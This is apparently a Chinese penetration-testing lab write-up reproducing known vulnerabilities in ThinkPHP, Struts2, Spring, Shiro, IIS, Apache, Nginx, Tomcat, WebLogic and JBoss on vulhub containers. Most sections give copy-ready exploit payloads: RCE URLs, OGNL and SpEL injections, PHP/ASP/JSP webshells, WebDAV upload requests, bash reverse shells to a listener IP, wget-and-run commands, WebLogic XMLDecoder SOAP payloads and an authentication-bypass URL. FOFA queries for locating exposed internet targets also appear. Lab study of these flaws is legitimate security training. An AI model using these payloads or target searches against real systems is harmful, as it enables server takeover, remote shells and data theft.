1.Thinkphp
Thinkphp5x远程命令执行及getshell
搭建靶场
cd vulhub/thinkphp/5-rce
docker-compose up -d
首页
![](https://i-blog.csdnimg.cn/img_convert/53856f3dd8f1e280dc1e5243c197415c.png)
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现⼀些问题。
远程命令执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
![](https://i-blog.csdnimg.cn/img_convert/306bb3fe7c0ceb073515ccc9f02af581.png)
远程代码执行
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
![](https://i-blog.csdnimg.cn/img_convert/046b865f040a97d0ee5a93b0e81eba09.png)
远程getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd])?>" >>1.php
在根目录会生成1.php;直接访问即可
![](https://i-blog.csdnimg.cn/img_convert/3a12757c8e9ec083eb4c86e67a0b84d6.png)
漏洞挖掘
#fofa查询
body="V5.0.7" && title="System error"
body="ThinkPHP V5"
icon_hash="1165838194"
body="ThinkPHP V5" && country="US"
struts2
S2-057远程执行代码漏洞
#靶场搭建
cd vulhub/struts2/s2-057
docker-compose up -d
漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从而导致远程代码执行漏洞的发生。
S2-057 先决条件:
alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性,或使用了通配符用户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执型行漏洞。
访问地址
/struts2-showcase/
![](https://i-blog.csdnimg.cn/img_convert/6a1b3e7b3bc513ffb2db815b0c44b87a.png)
在url处输入后刷新可以看到中间数字位置相加了。
/struts2-showcase/${(123+123)}/actionChain1.action
![](https://i-blog.csdnimg.cn/img_convert/5c309c3541be1df02a58eb5beffa6f09.png)
![](https://i-blog.csdnimg.cn/img_convert/ee8d353a933859cd468ab0e4725b457c.png)
会发现他文件命也会变;所以我们每次都得改回来
将上面验证payload的值修改为我们的利用exp
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D
![](https://i-blog.csdnimg.cn/img_convert/f10fd53026d6fc6f80680a1980e2bd92.png)
![](https://i-blog.csdnimg.cn/img_convert/511f02b0124db533de5b98ec20949e79.png)
![](https://i-blog.csdnimg.cn/img_convert/49068a423e3afa0a03cf6f8dbbb0eb2a.png)
漏洞挖掘
#fofa查询
app="Struts2"
Spring
Spring Data Rest 远程命令执行命令(CVE-2017-8046)
#靶场搭建
cd vulhub/spring/CVE-2017-8046
docker-compose up -d
来到首页去访问http://8.155.7.133:8080/customers/1
![](https://i-blog.csdnimg.cn/img_convert/1a4965492833d6a56b870651d773b7ee.png)
![](https://i-blog.csdnimg.cn/img_convert/a8f87c9b72f7d8924729114dcff85681.png)
在此页面抓取数据包,使用PATCH请求来修改
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success 里面的数字是ascii码
![](https://i-blog.csdnimg.cn/img_convert/63b1c0538de3ed2b6c4718e331433c03.png)
然后进到docker容器里去看
docker exec -it bbf4d25afb18 /bin/bash
![](https://i-blog.csdnimg.cn/img_convert/a400198a14d870228980da4e0dd525c4.png)
spring 代码执行 (CVE-2018-1273)
Spring Data 是⼀个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有子项目共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注入漏洞,攻击者可以注入恶意 SpEL 表达式以执行任意命令。
#靶场搭建
cd vulhub/spring/CVE-2018-1273
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/fade02042a5a2eda5d8f6e925352b2b2.png)
访问地址
/users
![](https://i-blog.csdnimg.cn/img_convert/f3b91c2c46880663f1cc92a08472e835.png)
在此页面进行抓包注册
加上POC
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/h")]=&password=&repeatedPassword=
![](https://i-blog.csdnimg.cn/img_convert/61b770519b61362876d2aa4db22d3f3c.png)
进入容器查看
docker exec -it ID /bin/bash
![](https://i-blog.csdnimg.cn/img_convert/aa67dcb63b13a22046184a90f626bcd7.png)
反弹shell
在3.sh写
bash -i >& /dev/tcp/8.155.7.133/6666 0>&1
![](https://i-blog.csdnimg.cn/img_convert/11cc727ab28def419424cd9b2c5ffc56.png)
监听6666端口
![](https://i-blog.csdnimg.cn/img_convert/ad668721dabbe9dd6544078ed476bf98.png)
搭建对外服务
![](https://i-blog.csdnimg.cn/img_convert/a8dbcbb89b0833e8f63202cdb0f93792.png)
![](https://i-blog.csdnimg.cn/img_convert/938f409a0d16ebf878f45889d5fea1f4.png)
BP修改语句
wget -O /tmp/shell.sh http://8.155.7.133:8888/3.sh
![](https://i-blog.csdnimg.cn/img_convert/ad4be8af88289bc95e1442c88c4542dd.png)
执行
bash -i /tmp/1shell.sh
![](https://i-blog.csdnimg.cn/img_convert/1bad931977ce9c4564586493e60dabd4.png)
![](https://i-blog.csdnimg.cn/img_convert/3dbfc6b1aecfce9d3b6a77a1eaa27ec6.png)
漏洞挖掘
#fofa查询
icon_hash="116323821"
app="vmware-SpringBoot-framework"
Shiro
Shiro漏洞指纹
响应包中存在字段set-Cookie: rememberMe=deleteMe
Shiro rememberMe反序列化漏洞(Shiro-550)
Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
#靶场搭建
cd vulhub/shiro/CVE-2016-4437
docker-compose up -d
![](https://i-blog.csdnimg.cn/img_convert/6e9b73d882ec59ff9f90d7e75a886f3a.png)
验证Shiro框架
使用BurpSuite进行抓包,在请求包中的cookie字段中添加rememberMe=123;,看响应包header中是否返回rememberMe=deleteMe值,若有,则证明该系统使用了Shiro框架
#构造语句
Cookie:rememberMe=123
![](https://i-blog.csdnimg.cn/img_convert/23174faec93e076a497df2faa01954f9.png)
![](https://i-blog.csdnimg.cn/img_convert/1dde05f10d6f8bae218d9af43849f4df.png)
利用工具
先爆破密钥;爆破利用链;执行命令
![](https://i-blog.csdnimg.cn/img_convert/8fad95e2718a3786e5759612c52c58ec.png)
反弹shell
#开启对外服务
python3 -m http.server 8888
#监听端口
nc -lvvp 6666
#执行命令
wget -O /tmp/shell.sh http://IP/3.sh
/bin/bash /tmp/shell.sh
![](https://i-blog.csdnimg.cn/img_convert/8448177ea4363b83f599ddc505c43a2c.png)
中间件
IIS
IIS6.x篇
PUT漏洞
IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。
先来到首页
![](https://i-blog.csdnimg.cn/img_convert/0b9817306414481b4902c2c9c38b2920.png)
在当前页面抓取数据包
在看提交OPTIONS探测查看当前支持什么协议
![](https://i-blog.csdnimg.cn/img_convert/41eb5b4f5de6206246d917aa46fd6619.png)
用PUT上传文档,但不能直接上传方法脚本文档,可以先上传⼀个其他类型的文档,然后移动成脚本文档
PUT /1.txt HTTP/1.1
Host: 192.168.47.138
Content-Length: 23
<%eval request("cmd")%>
![](https://i-blog.csdnimg.cn/img_convert/f003f3f1f44bbce624d83a0817aeb0dd.png)
使用move命令修改文件名
MOVE /1.txt HTTP/1.1
Host: 192.168.47.138
Destination: http://192.168.47.138/shell.asp
![](https://i-blog.csdnimg.cn/img_convert/5d580a9ab7558e6e2eabc88c7ab643c7.png)
![](https://i-blog.csdnimg.cn/img_convert/424d598aea442ad8bcac316dd60acd1f.png)
IIS6.0解析漏洞
在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行
![](https://i-blog.csdnimg.cn/img_convert/c72dd23274f13e75793fbe163c6db99e.png)
在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码
#asp一句话
<%eval request("h")%>
单独创建一个1.jpg发现并不能解析
![](https://i-blog.csdnimg.cn/img_convert/cf5b1fe44d97c75feff89dfff29149e5.png)
在a.asp下被解析
![](https://i-blog.csdnimg.cn/img_convert/f5310780e974feacb867743e661c4687.png)
在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是
shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx
IIS短文件漏洞
Windows 以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16位 Windows的程序访问这些文件。在cmd下输入" dir /x"即可看到短文件名的效果
![](https://i-blog.csdnimg.cn/img_convert/0b019651002734e407f197fa35664169.png)
#原理
当后缀⼩于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位。
当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名。
使⽤payload验证目标是否存在IIS短文件名漏洞,显示的404,说明目标存在该短文件名:
在根目录创建
![](https://i-blog.csdnimg.cn/img_convert/946754171de31418d2214017200031ce.png)
访问
http://192.168.47.138/a*~1*/shell.aspx
404说明有这个文件
![](https://i-blog.csdnimg.cn/img_convert/0f07ea8041824444ee765fdda178e105.png)
![](https://i-blog.csdnimg.cn/img_convert/ef992ae57e084b4733879c2b78193743.png)
![](https://i-blog.csdnimg.cn/img_convert/4db7e430d76d77ab66d06276ce863c17.png)
403说明没有
![](https://i-blog.csdnimg.cn/img_convert/3426daa015297cf4c0ae9879959d6c13.png)
![](https://i-blog.csdnimg.cn/img_convert/bdd2d6174305f7666cc35a56a6d5e29f.png)
IS RCE-CVE-2017-7269
利用工具反弹shell
python2 '/root/桌面/iis6 reverse shell' 靶机IP 80 kali 8888
![](https://i-blog.csdnimg.cn/img_convert/2e0dd05db0a81091525f9830a7f6a40b.png)
IIS 7x篇
HTTP.SYS远程代码执行(MS15-034) MS-->Microsoft 2015 -034
![](https://i-blog.csdnimg.cn/img_convert/079b8a7c184da2cfd79857b2547b5f4e.png)
![](https://i-blog.csdnimg.cn/img_convert/1048ba3aefa4e0df618b89bfbecb3145.png)
![](https://i-blog.csdnimg.cn/img_convert/f9bc03098dbad7a8ec729668b37228b0.png)
![](https://i-blog.csdnimg.cn/img_convert/be975f24db94c6d812b3f93bf7e0137d.png)
Apache
未知扩展名解析漏洞
cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
无论我们的php在哪都会解析我们文件里的php代码
![](https://i-blog.csdnimg.cn/img_convert/99d60703444114d74e229015dcc8575e.png)
<?php @eval($_POST["c"])?>
访问一下我们上传的文件
![](https://i-blog.csdnimg.cn/img_convert/657579570f10c918fcc4aecae70d77b5.png)
AddHandler导致的解析漏洞
同上一样的
目录遍历漏洞
![](https://i-blog.csdnimg.cn/img_convert/194bb5f3ade043d31940928812cc767a.png)
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
cd vulhub/httpd/CVE-2017-15715
docker-compose up -d
上传我们的一句话;并使用BP抓取数据包
![](https://i-blog.csdnimg.cn/img_convert/13b6b3e09f68df511aae97fd5d5a3f35.png)
在我们的文件名后加一个空格
![](https://i-blog.csdnimg.cn/img_convert/55fd7befcdf9e511a39e842d371f6f6d.png)
把我们的空格20换成0a
![](https://i-blog.csdnimg.cn/img_convert/46a7e6f5f4a555d29a960c2e7cdae6d1.png)
直接去访问我们的一句话
![](https://i-blog.csdnimg.cn/img_convert/f71cd39f831f3173ed84538cef23a7c2.png)
Nginx
文件解析漏洞
#靶场搭建
cd vulhub/nginx/nginx_parsing_vulnerability/
docker-compose up -d
上传我们的图片马
![](https://i-blog.csdnimg.cn/img_convert/15cbefc37ede198b423b8723cbcec02e.png)
获取路径后
![](https://i-blog.csdnimg.cn/img_convert/cf240c9303dc10ac3d91fdb12b5e6608.png)
去访问我们的图片马并在后面加上/.php
![](https://i-blog.csdnimg.cn/img_convert/d4ee1fbacff013a09a6f8efb3d951c4b.png)
蚁剑测试连接
![](https://i-blog.csdnimg.cn/img_convert/b5552c445b44a4611ca703f75603c877.png)
目录遍历漏洞
![](https://i-blog.csdnimg.cn/img_convert/76bd69148b9b2d30dcbc7ef8d972c790.png)
CRLF注入漏洞
环境搭建
vluhub靶场
cd vulhub/nginx/insecure-configuration
docker-compose up -d
首页就是这样
![](https://i-blog.csdnimg.cn/img_convert/729c431d0c0cdbe2ccf6d6e0e8db5fd0.png)
然后打开BP进行抓包
在头部构造我们的语句
%0aSet-cookie:jessioni=1
在响应处就可以看到我们构造的cookie
![](https://i-blog.csdnimg.cn/img_convert/8a6c76d280daf40cc9d5d774616db2e9.png)
文件名逻辑漏洞(CVE-2013-4547)
vulhub靶场
cd vulhub/nginx/CVE-2013-4547
docker-compose up -d
来到首页在当前页面上传1.jpg;并进行抓包
1.jpg内容
![](https://i-blog.csdnimg.cn/img_convert/746b9f14df0de0b41ca5a09bdc3087a6.png)
![](https://i-blog.csdnimg.cn/img_convert/bd9c778cda7789e4f01b050b8f1d3e39.png)
在文件末尾我们给他加一个空格
![](https://i-blog.csdnimg.cn/img_convert/f5b840746c00a53810d9bc24d380c91e.png)
去访问/uploadfiles/1.jpg...php;并用BP抓包
![](https://i-blog.csdnimg.cn/img_convert/564bfd1cc6363bdd8a805e28a5de975b.png)
![](https://i-blog.csdnimg.cn/img_convert/971a1edeb4bc7643eba7ab03bb1c1c3d.png)
把2e,2e,2e改为20,00,2e
![](https://i-blog.csdnimg.cn/img_convert/dff8c1242432b4e2b4798f695ba2d625.png)
![](https://i-blog.csdnimg.cn/img_convert/f49e3cb16e437d776882d93f4e0206ce.png)
tomcat
Tomcat 远程代码执行漏洞(CVE-2017-12615)
#靶场搭建
cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d
来到首页;我们使用BP抓取当前页面数据包
![](https://i-blog.csdnimg.cn/img_convert/21523fda6779da853d86c5e145babbb6.png)
PUT方式提交并写入木马
#绕过方式
PUT /shell.jsp%20
PUT /shell.jsp::$DATA
PUT /shell.jsp/
![](https://i-blog.csdnimg.cn/img_convert/16ece4d0d79bf51853fa3393e7712ea9.png)
直接去访问我们的木马
![](https://i-blog.csdnimg.cn/img_convert/4c6efa19e07cd85d10370f7b5ae8e56f.png)
tomcat弱口令&war远程部署
环境搭建
vulhub 靶场
cd vulhub/tomcat/tomcat8
docker-compose up -d
来到首页
![](https://i-blog.csdnimg.cn/img_convert/e225963a093b9bcd3264282658a90869.png)
![](https://i-blog.csdnimg.cn/img_convert/53a8723cb97bf65ea1180f358270a5ee.png)
在我们之前生成的jsp木马(1.jsp)给他打包成zip;后缀改位war
![](https://i-blog.csdnimg.cn/img_convert/770c1e913fb2e76b28338f8b49e3ef6c.png)
![](https://i-blog.csdnimg.cn/img_convert/a4f84e8c3c4d2dfdfdf0207614ddb1a2.png)
我们去访问一下访问成功就去连接
![](https://i-blog.csdnimg.cn/img_convert/8059f56948f6b818e0801905990c732e.png)
![](https://i-blog.csdnimg.cn/img_convert/8ce2a4bac0ae95b1a59462f22e6a6b7c.png)
tomcat 远程代码执行(CVE-2019-0232)
来到首页
![](https://i-blog.csdnimg.cn/img_convert/2964f8a22c7317256da763394457c7c8.png)
访问地址
/cgi-bin/cmd.bat
输入
/cgi-bin/cmd.bat?&C%3A%5CWindows%5Csystem32%5Ccalc.exe
![](https://i-blog.csdnimg.cn/img_convert/e10b355b0eb393e70415c875e764167b.png)
下载出来了;说明靶机那里会弹计算机
Apache Tomcat文件包含漏洞(CVE-2020-1938)
环境搭建
vulhub靶场
cd vulhub/tomcat/CVE-2020-1938
docker-compose up -d
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 8.155.7.133
![](https://i-blog.csdnimg.cn/img_convert/a70352784599413da73dd0a935a6e018.png)
WebLogic
weblogic 弱口令getshell漏洞
环境搭建
vulhub 靶场
cd vulhub/weblogic/weak_password
docker-compose up -d
IP/console/login/LoginForm.jsp
![](https://i-blog.csdnimg.cn/img_convert/5c65c33ff71cdcdc8167ebac6afc6013.png)
部署-->安装
![](https://i-blog.csdnimg.cn/img_convert/1256c4873527d80dffd99635534c1eac.png)
选择上传文件;选择我们之前war包
![](https://i-blog.csdnimg.cn/img_convert/79f66bc025275ca551431405ae3e5a7b.png)
![](https://i-blog.csdnimg.cn/img_convert/3dab247c79bf69618c9a75b18f685143.png)
![](https://i-blog.csdnimg.cn/img_convert/bd494fe4d6f95abba8acc6c66060b274.png)
可以看到我们的war包
![](https://i-blog.csdnimg.cn/img_convert/cf81346c668bd2d190c23377a93a2ddb.png)
然后去访问我们的木马;哥斯拉连接
![](https://i-blog.csdnimg.cn/img_convert/a8d9526b6856ee5c6759af8eddb125e0.png)
XMLDecoder反序列化漏洞(CVE-2017-3506)
环境搭建
vulhub 靶场
cd vulhub/weblogic/weak_password
docker-compose up -d
#访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
/wls-wsat/CoordinatorPortType
![](https://i-blog.csdnimg.cn/img_convert/083b1bf29883caa57c7b6599de7aa912.png)
在当前页面抓包之后,添加下面请求包,反弹shell。
先监听我们的6666端口
![](https://i-blog.csdnimg.cn/img_convert/e249eba93368948766eb53c885d8367c.png)
修改请求方式;构造POC
![](https://i-blog.csdnimg.cn/img_convert/8ed41865f85a7bab7bee13fd98854cc4.png)
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/8.155.7.133/6666 0>&1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
反弹成功
![](https://i-blog.csdnimg.cn/img_convert/3943b2d218e33e076a6fb36f3be7c90f.png)
wls-wsat反序列化漏洞(CVE-2019-2725)
vulhub 靶场
cd vulhub/weblogic/weak_password
docker-compose up -d
/_async/AsyncResponseService
![](https://i-blog.csdnimg.cn/img_convert/b4e76d391a8079d73e22a0e0bbad6aa8.png)
在当前页面抓包 , 修改请求包 , 写入shell
现在我们的home下创建1.txt;并写进jsp木马
![](https://i-blog.csdnimg.cn/img_convert/0c686f4bfdbeffcfb9ec2d6a4d7d048d.png)
python3 -m http.server 6666
![](https://i-blog.csdnimg.cn/img_convert/73fe0a369e431b6ee535b8a2d324a322.png)
修改请求方法;构造POC
![](https://i-blog.csdnimg.cn/img_convert/671c2ce25a56ef9b396017e6ac15f72e.png)
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://8.155.7.133/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
木马位置
http://8.155.7.133:7001/bea_wls_internal/678.jsp
![](https://i-blog.csdnimg.cn/img_convert/1ae2bcc9225e8664d29e766e64147c80.png)
WebLogic T3协议反序列化命令执行漏洞(CVE-2018- 2628)
vulhub 靶场
cd vulhub/weblogic/CVE-2018-2628
docker-compose up -d
利用工具检测
![](https://i-blog.csdnimg.cn/img_convert/cdb6787a1c138d28c01aedc0a113ad8f.png)
WebLogic CVE-2018-2894文件任意上传
vulhub 靶场
cd vulhub/weblogic/CVE-2018-2894
docker-compose up -d
设置Web服务测试开启
/console/login/LoginForm.jsp
![](https://i-blog.csdnimg.cn/img_convert/a4b3234addf9dbb54b0d597c3f827b54.png)
域结构 -> base-domain -> 高级 -> 启动Web服务测试页
![](https://i-blog.csdnimg.cn/img_convert/bab6db5c1af92dfa6f51bbd62ea6b95a.png)
![](https://i-blog.csdnimg.cn/img_convert/65e2dbe4d9114d9e2a70f8442ec5d824.png)
然后保存;进入 config.do 文件进行设置,将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的,这⼀点很重要
/ws_utc/config.do
#更改目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
![](https://i-blog.csdnimg.cn/img_convert/fdf2a74865f993741c7365daf7c5d843.png)
![](https://i-blog.csdnimg.cn/img_convert/bc4b3eacd49499093b1b42b6fee6502f.png)
上传我们的木马
![](https://i-blog.csdnimg.cn/img_convert/5f61fdca12e06fcd1a231fc59f52528d.png)
这个是我们的时间戳
121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp
![](https://i-blog.csdnimg.cn/img_convert/28cbaa9ad6bee7a4a13df8eeb208d37d.png)
CVE-2020-14882 WebLogic远程代码执行漏洞
vulhub 靶场
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
#访问管理控制台
http://IP:7001/console/login/LoginForm.jsp
#使⽤以下url绕过登录认证
http://IP:7001/console/css/%252e%252e%252fconsole.portal
![](https://i-blog.csdnimg.cn/img_convert/535faa2598a4ac34c2fdf593c546761d.png)
未授权访问绕过
![](https://i-blog.csdnimg.cn/img_convert/5730ffcc1ad2f4de0eb1db70c31d006c.png)
http://IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabe=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")
可以看到执行成功了
![](https://i-blog.csdnimg.cn/img_convert/46ca108d4e73a1fb1ad10c291ef8dd41.png)
JBoss
JMX Console未授权访问Getshell
vulhub 靶场
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
访问地址:/jmx-console/
这里我们使用得复现环境不存在,所以需要密码(正常环境无需密码直接可进⼊)
找到这个点进去
![](https://i-blog.csdnimg.cn/img_convert/00098e146fb6bf849819c685499d1658.png)
在找这个
![](https://i-blog.csdnimg.cn/img_convert/d27f58ba27f0e4e1b6a7d44374a9a97d.png)
制作war包填写远程地址
python3 -m http.server 8888
![](https://i-blog.csdnimg.cn/img_convert/818683d0a7f154c35c198f143b0e69dc.png)
![](https://i-blog.csdnimg.cn/img_convert/29406f2f86f2c0ab61e28925e75da720.png)
连接成功
![](https://i-blog.csdnimg.cn/img_convert/ac36376de1d61ec68983f7c9537f44e4.png)
JBOSSMQ JMS CVE-2017-7504 集群反序列化漏洞 4.X
vulhub 靶场
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
访问地址:/jbossmq-httpil/HTTPServerILServlet
![](https://i-blog.csdnimg.cn/img_convert/af529c172be8ae760973ff2b8037a0d3.png)
python3 jexboss.py -u http://IP:8080
![](https://i-blog.csdnimg.cn/img_convert/93693c1e2cce34b3aac0091e8b65003f.png)
![](https://i-blog.csdnimg.cn/img_convert/189a60d27cb8869db5ce8bc7bfb4ad45.png)
JBoss 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
vulhub 靶场
cd vulhub/jboss/CVE-2017-12149
docker-compose up -d
搭建好靶场后利用工具直接打
![](https://i-blog.csdnimg.cn/img_convert/3d4d4f1b7708bd761b81d439a92befd4.png)
Jboss 5.x/6.x admin-Console后台部署war包Getshell
vulhub 靶场
cd vulhub/jboss/CVE-2017-12149
docker-compose up -d
访问地址:/jmx-console/
![](https://i-blog.csdnimg.cn/img_convert/1c8433d1594f8c17ab18381eb8efcf5e.png)
![](https://i-blog.csdnimg.cn/img_convert/9d220fcda12157cbd888b9d51672bf4e.png)
搭建远程部署 , 部署远程war包地址
python3 -m http.server 80
![](https://i-blog.csdnimg.cn/img_convert/1da93b535e8bd73e5f6618fe7a1b4698.png)
![](https://i-blog.csdnimg.cn/img_convert/f5f4c94ad8e85967422516356a79ba44.png)
![](https://i-blog.csdnimg.cn/img_convert/cc9e1c5642aeb607c2f0696e2524007d.png)
JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
vulhub 靶场
cd vulhub/jboss/JMXInvokerServlet-deserialization/
docker-compose up -d
搭建好后访问
/invoker/EJBInvokerServlet
返回如下说明存在反序列化
![](https://i-blog.csdnimg.cn/img_convert/351c03f28f1570bc1e59e23853985cc6.png)
将反弹shell进行base64编码
bash -i >& /dev/tcp/8.155.7.133/6666 0>&1
CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser
curl http://8.155.7.133:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
![](https://i-blog.csdnimg.cn/img_convert/da634179661d725a246e316639a0608d.png)
成功反弹
![](https://i-blog.csdnimg.cn/img_convert/ec32bd25eef8833364aa5c196d2eca78.png)
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)
vulhub 靶场
cd vulhub/jboss/JMXInvokerServlet-deserialization/
docker-compose up -d
跟上一关是一样的